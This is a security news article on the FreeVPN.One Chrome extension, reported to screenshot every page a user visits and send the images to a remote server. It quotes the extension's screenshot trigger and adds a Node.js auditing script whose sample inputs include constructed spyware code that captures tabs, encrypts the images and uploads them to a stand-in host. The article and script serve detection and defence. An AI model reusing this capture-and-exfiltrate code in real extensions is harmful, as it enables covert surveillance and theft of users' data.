Legitimate Chrome VPN With 100,000+ Installs Silently Captures Screenshots and Exfiltrates Sensitive Data

A Chrome VPN extension with over 100,000 installations and verified badge status has been discovered operating as sophisticated spyware, continuously capturing user screenshots and exfiltrating sensitive data without consent.

The extension, known as FreeVPN.One, masqueraded as a legitimate privacy tool while secretly implementing comprehensive surveillance capabilities that directly contradict its stated privacy promises.

FreeVPN.One — featured, verified, and spyware (Source – Koi.Security)

The extension gained prominence through Google's Chrome Web Store, achieving featured placement and verified status even though it shipped surveillance code that screenshots every webpage its users visit.

Operating under the guise of providing privacy protection, the extension employs a deceptive two-stage architecture that silently monitors user activity across all browsing sessions, capturing sensitive information including banking credentials, personal communications, and private documents.

Private pictures sent to the spyware’s backend (Source – Koi.Security)

Koi.Security analysts noted that the extension’s evolution from legitimate VPN service to spyware occurred through a series of calculated updates beginning in April 2025, when developers introduced broad permissions that enabled comprehensive data collection capabilities.

DevTools showing captured Google Sheets tab with sensitive data (Source – Koi.Security)

Security researchers identified the transformation as particularly concerning, given the extension’s verified status and widespread adoption among privacy-conscious users.

The surveillance campaign impacts users globally, with captured screenshots containing sensitive corporate data, financial information, and personal communications being transmitted to remote servers controlled by the threat actors.

The extension’s privileged position within users’ browsers enables unrestricted access to all browsing activity, creating a comprehensive intelligence-gathering operation that operates entirely without user knowledge or consent.

Technical Implementation and Evasion Mechanisms

The extension deploys its surveillance through a content script that Chrome injects into every HTTP and HTTPS page, declared with the broad matches: ["http://*/*", "https://*/*"] pattern.

Once a page loads, the injected script starts a fixed delay before acting:

// Content script: wait 1,100 ms after the page loads, then ask the
// background service worker to screenshot the visible tab
setTimeout(() => {
    chrome.runtime.sendMessage({action: 'captureViewport'});
}, 1100);

The script waits 1.1 seconds (1,100 ms) after the page loads before requesting a capture, long enough for the page to finish rendering so the screenshot contains the fully loaded content.

‘Scan with AI’ click redirect to aitd[.]one site (Source – Koi.Security)

The background service worker receives the captureViewport message and takes the screenshot with Chrome's privileged chrome.tabs.captureVisibleTab() API, which returns the visible tab as an image; the worker then transmits that image to aitd[.]one/brange.php together with the page URL, the tab identifier, and a unique per-user tracking code.

Recent versions wrap the payload in AES-256-GCM encryption with RSA key wrapping, so inspecting the body of the outbound requests no longer reveals the screenshots. The destination host and the pattern of a POST after every page load remain observable, but content-based network detection becomes significantly harder.

The encryption layer masks the continuous screenshot exfiltration while maintaining the extension’s surveillance capabilities, demonstrating the threat actors’ commitment to persistence and detection evasion.

The extension's permission set combines host access to every site (the broad match pattern above) with the tabs and scripting permissions, a surveillance-capable combination that goes far beyond what a VPN extension needs and enables complete monitoring of user activity.
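The following Node.js script is added here as an illustration; it is not Koi Security's tooling or code from the extension. It audits an extension manifest for the permission combination described above (a content script on every site, tabs, scripting, all-site host access) and scans unpacked script text for the indicators the article names: a captureVisibleTab call, a delayed sendMessage on page load, and AES-GCM with RSA key wrapping ahead of an upload. The two manifests, the script snippets and the exfil.example upload host are constructed sample inputs, not artifacts of FreeVPN.One, and the risk levels are this example's own heuristic.

```javascript
// Added example for this article, not Koi Security's tooling or FreeVPN.One's code:
// a static audit of a Chrome extension manifest plus an indicator scan of its script
// text, flagging the combination the article describes (content script on every
// site, tabs/scripting, all-site host access, captureVisibleTab, encrypted upload).
// All manifests, script snippets and the exfil.example host are CONSTRUCTED inputs.

const ALL_SITE_PATTERNS = new Set(['<all_urls>', 'http://*/*', 'https://*/*', '*://*/*']);

// True if any match pattern grants access to (essentially) every website.
function coversAllSites(patterns) {
  return (patterns || []).some((p) => ALL_SITE_PATTERNS.has(p));
}

// Audit a parsed MV3 manifest; returns findings and a coarse risk level (own heuristic).
function auditManifest(manifest) {
  const perms = new Set(manifest.permissions || []);
  const allHosts = coversAllSites(manifest.host_permissions) || perms.has('<all_urls>');
  const scriptsEverywhere = (manifest.content_scripts || []).some((cs) => coversAllSites(cs.matches));
  const findings = [];

  if (scriptsEverywhere) findings.push('content script injected into every http/https page');
  if (allHosts) findings.push('host permission covering all sites');
  if (perms.has('tabs')) findings.push('tabs: can read the URL and title of every open tab');
  if (perms.has('scripting')) findings.push('scripting: can inject code into pages at runtime');

  // chrome.tabs.captureVisibleTab only works on tabs the extension has host access to
  // (<all_urls>, a matching host pattern, or activeTab after a user gesture). All-site
  // host access plus a content script firing on every load is the per-page screenshot
  // setup described in the article; activeTab alone would need a click per capture.
  const screenshotCapable = allHosts && scriptsEverywhere;
  if (screenshotCapable) findings.push('can screenshot every page on load (captureVisibleTab + all-site access)');

  const riskLevel = screenshotCapable ? 'high' : findings.length >= 2 ? 'medium' : 'low';
  return { findings, screenshotCapable, riskLevel };
}

// Crude indicator scan of unpacked script text (content scripts + service worker).
function scanScript(source) {
  const checks = {
    captureVisibleTab: /chrome\.tabs\.captureVisibleTab\s*\(/,
    delayedMessageOnLoad: /setTimeout\s*\([\s\S]{0,300}?chrome\.runtime\.sendMessage/,
    envelopeEncryption: /AES-GCM[\s\S]*?(?:RSA-OAEP|wrapKey)|(?:RSA-OAEP|wrapKey)[\s\S]*?AES-GCM/,
  };
  const indicators = Object.entries(checks).filter(([, re]) => re.test(source)).map(([name]) => name);
  // Hard-coded upload targets: every host named inside a fetch() or XHR open() call.
  const uploadHosts = new Set();
  for (const m of source.matchAll(/(?:fetch|open)\s*\([^)]*?['"]https?:\/\/([^\/'"\s]+)/g)) uploadHosts.add(m[1]);
  return { indicators, uploadHosts: [...uploadHosts].sort() };
}

// ---- constructed sample inputs (not taken from the real extension) ---------------
const SUSPECT_MANIFEST = {
  manifest_version: 3,
  name: 'Example VPN (constructed)',
  permissions: ['proxy', 'storage', 'tabs', 'scripting'],
  host_permissions: ['<all_urls>'],
  background: { service_worker: 'worker.js' },
  content_scripts: [{ matches: ['http://*/*', 'https://*/*'], js: ['content.js'] }],
};

// What a proxy-based VPN extension actually needs: no content scripts, no tabs.
const BASELINE_VPN_MANIFEST = {
  manifest_version: 3,
  name: 'Minimal VPN (constructed)',
  permissions: ['proxy', 'storage'],
  background: { service_worker: 'worker.js' },
};

const SUSPECT_CONTENT_SCRIPT = `
setTimeout(() => {
  chrome.runtime.sendMessage({ action: 'captureViewport' });
}, 1100);
`;

const SUSPECT_WORKER = `
chrome.runtime.onMessage.addListener(async (msg, sender) => {
  if (msg.action !== 'captureViewport') return;
  const png = await chrome.tabs.captureVisibleTab(sender.tab.windowId, { format: 'png' });
  const key = await crypto.subtle.generateKey({ name: 'AES-GCM', length: 256 }, true, ['encrypt']);
  const wrapped = await crypto.subtle.wrapKey('raw', key, serverRsaPublicKey, { name: 'RSA-OAEP' });
  fetch('https://exfil.example/upload', { method: 'POST', body: JSON.stringify({ png, wrapped }) });
});
`;

for (const [label, m] of [['suspect', SUSPECT_MANIFEST], ['baseline', BASELINE_VPN_MANIFEST]]) {
  console.log(label, JSON.stringify(auditManifest(m), null, 1));
}
console.log('scan', JSON.stringify(scanScript(SUSPECT_CONTENT_SCRIPT + SUSPECT_WORKER)));
```

To run it against a real unpacked extension, feed auditManifest the JSON.parse of its manifest.json and feed scanScript the concatenated files listed under content_scripts[].js and background.service_worker. A proxy-based VPN needs the proxy permission and little else, so any content script matching all sites, or tabs combined with all-site host access, deserves a manual look; the indicator scan is a triage aid, not proof, since minified or dynamically assembled code can dodge these patterns.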

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.